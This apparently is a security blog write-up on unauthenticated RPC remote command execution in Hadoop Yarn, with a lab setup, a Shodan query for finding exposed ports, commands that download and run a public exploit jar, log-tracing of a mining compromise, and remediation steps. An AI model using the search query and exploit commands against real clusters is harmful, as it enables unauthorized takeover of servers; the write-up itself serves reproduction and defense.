Understanding and Mitigating Security Risks in Hadoop Yarn: RPC Service Vulnerabilities and Exploits

Hadoop Yarn Vulnerability Description

Hadoop Yarn, as one of the core components of Hadoop, is responsible for allocating resources to various clusters to run different applications and scheduling tasks on different cluster nodes. Hadoop Yarn by default exposes RPC services externally, which attackers can exploit to execute arbitrary commands and control the server. Additionally, since the access control mechanism for Hadoop Yarn RPC services is different from that of the REST API, the port where the RPC service is located can still be accessed without authorization even when the REST API has authorization and authentication enabled.

Hadoop Yarn Vulnerability Affected Versions

All versions of Apache Hadoop

Shodan Search Syntax: Hadoop Yarn

http.html:"HTTP request to a Hadoop IPC port"
Hadoop Yarn

Vulnerability Environment Setup

Since this vulnerability affects all versions, we can directly reuse the previous unauthorized REST API environment setup from vulhub.

https://github.com/vulhub/vulhub/tree/master/hadoop/unauthorized-yarn

You need to modify the docker-compose.yml file to add port mapping.

Hadoop Yarn

docker-compose up -d

curl request to port 8032.

[root@VM-0-15-centos unauthorized-yarn]# curl 127.0.0.1:8032
It looks like you are making an HTTP request to a Hadoop IPC port. This is not the correct port for the web interface on this daemon.
[root@VM-0-15-centos unauthorized-yarn]# 

Vulnerability Exploit

https://github.com/cckuailong/YarnRpcRCE

Vulnerability Reproduction

wget https://github.com/cckuailong/YarnRpcRCE/releases/download/0.0.1/YarnRpcUnauth.jar
# Create file
java -jar YarnRpcUnauth.jar ip:port "touch /tmp/success"

Since we set up the vulnerability environment using docker-compose, there are four containers. The container executing the command may not be the one hosting the listening port service.

docker ps | grep unauthorizedyarn | awk '{print $1}' | xargs -I % docker exec -i % ls -l /tmp

Traceback Investigation

Main log locations for several key nodes.

  • ResourceManager log
  • NodeManager log
  • Container log

/var/log/hadoop-yarn

If Hadoop is running via docker, you can investigate using docker logs.

docker-compose logs| grep nodemanager.ContainerExecutor

Hadoop was compromised for mining after startup

However, the attacker’s IP was not recorded.

Remediation

  1. Apache Hadoop officially recommends users enable Kerberos authentication.
  2. Use iptables or security groups to restrict the Hadoop RPC service port to trusted addresses only.